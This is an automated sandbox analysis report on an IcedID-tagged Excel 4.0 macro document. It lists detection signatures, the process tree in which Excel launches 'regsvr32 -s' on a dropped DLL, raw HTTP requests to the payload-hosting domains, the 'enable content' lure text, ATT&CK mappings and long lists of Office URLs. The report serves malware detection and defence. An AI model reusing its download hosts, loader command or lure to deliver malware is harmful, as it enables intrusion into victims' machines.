Analysis Report documents-1819557117.xlsm

Overview

General Information

Sample Name: documents-1819557117.xlsm
Analysis ID: 384703
MD5: 4dd14d22cd0272ae24128bb1356a842c
SHA1: abf7d941f4ebf949816c5576060bfce76f836ae9
SHA256: f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e
Tags: IcedID, XLSM

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5520 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6436 cmdline: regsvr32 -s ..\ghnrope MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6444 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6456 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6480 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6500 cmdline: regsvr32 -s MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: app.xml | Rule: JoeSecurity_XlsWithMacro4 | Description: Yara detected Xls With Macro 4.0 | Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif | ReversingLabs: Detection: 12%
Source: C:\Users\user\ghnrope2.dll | ReversingLabs: Detection: 12%
Multi AV Scanner detection for submitted file
Source: documents-1819557117.xlsm | ReversingLabs: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 162.251.80.27:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.222.38.97:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.201.252.173:443 -> 192.168.2.5:49710 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\ghnrope2.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: 0604[1].gif.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: global traffic | DNS query: name: runolfsson-jayde07s.ru.com
Source: global traffic | TCP traffic: 192.168.2.5:49708 -> 162.251.80.27:443
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 8.211.4.209:80
Source: Joe Sandbox View | IP Address: 162.251.80.27
Source: Joe Sandbox View | IP Address: 8.211.4.209
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET /ind.html HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: runolfsson-jayde07s.ru.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /ind.html HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: cremin-ian07u.ru.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /ind.html HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: runolfsson-jayde07s.ru.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /ind.html HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: cremin-ian07u.ru.com
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: runolfsson-jayde07s.ru.com
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 503 Service Unavailable
  Date: Fri, 09 Apr 2021 14:32:49 GMT
  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
  X-Powered-By: PHP/5.4.16
  Content-Length: 76
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
  Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 15Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
    Source: Document image extraction number: 15Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: documents-1819557117.xlsmInitial sample: CALL
    Source: documents-1819557117.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: documents-1819557117.xlsmInitial sample: Sheet size: 24417
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ghnrope2.dllJump to dropped file
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif 0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
    Source: Joe Sandbox ViewDropped File: C:\Users\user\ghnrope2.dll 0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
    Source: workbook.xmlBinary string: " sheetId="6" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/><sheet name="Doc3" sheetId="5" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$AO$28</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engine | Classification label: mal100.expl.evad.winXLSM@11/14@5/4
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{C20F957A-8CD7-42EE-8B0B-242FAAEC719B} - OProcSessId.dat
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: documents-1819557117.xlsm | ReversingLabs: Detection: 10%
    Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\ghnrope
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/media/image4.png
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: documents-1819557117.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\ghnrope2.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\ghnrope2.dll
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000004.00000002.243420621.0000000000800000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara match | File source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting21 | DLL Side-Loading1 | Process Injection1 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol14 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer3 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

    Behavior Graph


    Screenshots

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    documents-1819557117.xlsm | 11% | ReversingLabs | |

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif | 12% | ReversingLabs | Win64.Trojan.Wacatac |
    C:\Users\user\ghnrope2.dll | 12% | ReversingLabs | Win64.Trojan.Wacatac |

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    https://cdn.entity. | 0% | URL Reputation | safe |
    https://powerlift.acompli.net | 0% | URL Reputation | safe |
    https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
    https://cortana.ai | 0% | URL Reputation | safe |
    https://api.aadrm.com/ | 0% | URL Reputation | safe |
    https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
    https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
    https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
    https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe |
    https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
    https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
    https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
    https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
    https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
    https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
    https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
    https://ncus.contentsync. | 0% | URL Reputation | safe |
    https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
    http://runolfsson-jayde07s.ru.com/ind.html | 0% | Avira URL Cloud | safe |
    https://wus2.contentsync. | 0% | URL Reputation | safe |
    https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
    http://cremin-ian07u.ru.com/ind.html | 0% | Avira URL Cloud | safe |
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe |
    https://ncus.pagecontentsync. | 0% | URL Reputation | safe |
    https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe |
    https://dataservice.o365filtering.com | 0% | URL Reputation | safe |
    https://api.cortana.ai | 0% | URL Reputation | safe |
    https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe |
    https://directory.services. | 0% | URL Reputation | safe |

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    runolfsson-jayde07s.ru.com | 8.211.4.209 | true | false | | unknown
    cremin-ian07u.ru.com | 8.211.4.209 | true | false | | unknown
    api.globalsign.cloud | 104.18.25.243 | true | false | | unknown
    cesiroinsurance.com | 67.222.38.97 | true | false | | unknown
    shalombaptistchapel.com | 162.251.80.27 | true | false | | unknown
    innermetransformation.com | 173.201.252.173 | true | false | | unknown

                Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://runolfsson-jayde07s.ru.com/ind.html | false | Avira URL Cloud: safe | unknown
    http://cremin-ian07u.ru.com/ind.html | false | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    https://api.diagnosticssdf.office.com | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://login.microsoftonline.com/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://shell.suite.office.com:1443 | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://autodiscover-s.outlook.com/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://cdn.entity. | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://api.addins.omex.office.net/appinfo/query | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://clients.config.office.net/user/v1.0/tenantassociationkey | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://powerlift.acompli.net | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://rpsticket.partnerservices.getmicrosoftkey.com | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://lookup.onenote.com/lookup/geolocation/v1 | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://cortana.ai | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://cloudfiles.onenote.com/upload.aspx | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://entitlement.diagnosticssdf.office.com | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://api.aadrm.com/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://ofcrecsvcapi-int.azurewebsites.net/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | Avira URL Cloud: safe | unknown
    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://api.microsoftstream.com/api/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://cr.office.com | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://portal.office.com/account/?ref=ClientMeControl | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://ecs.office.com/config/v2/Office | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://graph.ppe.windows.net | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://res.getmicrosoftkey.com/api/redemptionevents | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://powerlift-frontdesk.acompli.net | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://tasks.office.com | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://officeci.azurewebsites.net/api/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | Avira URL Cloud: safe | unknown
    https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://store.office.cn/addinstemplate | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://outlook.office.com/autosuggest/api/v1/init?cvid= | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://globaldisco.crm.dynamics.com | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://store.officeppe.com/addinstemplate | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://dev0-api.acompli.net/autodetect | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://www.odwebp.svc.ms | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://api.powerbi.com/v1.0/myorg/groups | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://web.microsoftstream.com/video/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://graph.windows.net | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://dataservice.o365filtering.com/ | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://officesetup.getmicrosoftkey.com | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | URL Reputation: safe | unknown
    https://analysis.windows.net/powerbi/api | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false | | high
    https://prod-global-autodetect.acompli.net/autodetect | 7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.dr | false
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://outlook.office365.com/autodiscover/autodiscover.json7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                high
                                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                  high
                                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                    high
                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                      high
                                                                                      https://ncus.contentsync.7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                        high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                          high
                                                                                          http://weather.service.msn.com/data.aspx7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                            high
                                                                                            https://apis.live.net/v5.0/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                              high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                  high
                                                                                                  https://management.azure.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                    high
                                                                                                    https://wus2.contentsync.7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://incidents.diagnostics.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                      high
                                                                                                      https://clients.config.office.net/user/v1.0/ios7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                        high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmedia7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                          high
                                                                                                          https://o365auditrealtimeingestion.manage.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office365.com/api/v1.0/me/Activities7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                              high
                                                                                                              https://api.office.net7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                high
                                                                                                                https://incidents.diagnosticssdf.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                  high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policies7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                    high
                                                                                                                    https://entitlement.diagnostics.office.com7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                      high
                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office.com/7F71DD77-C2D9-4F65-ACF1-025D1C4A7561.0.drfalse
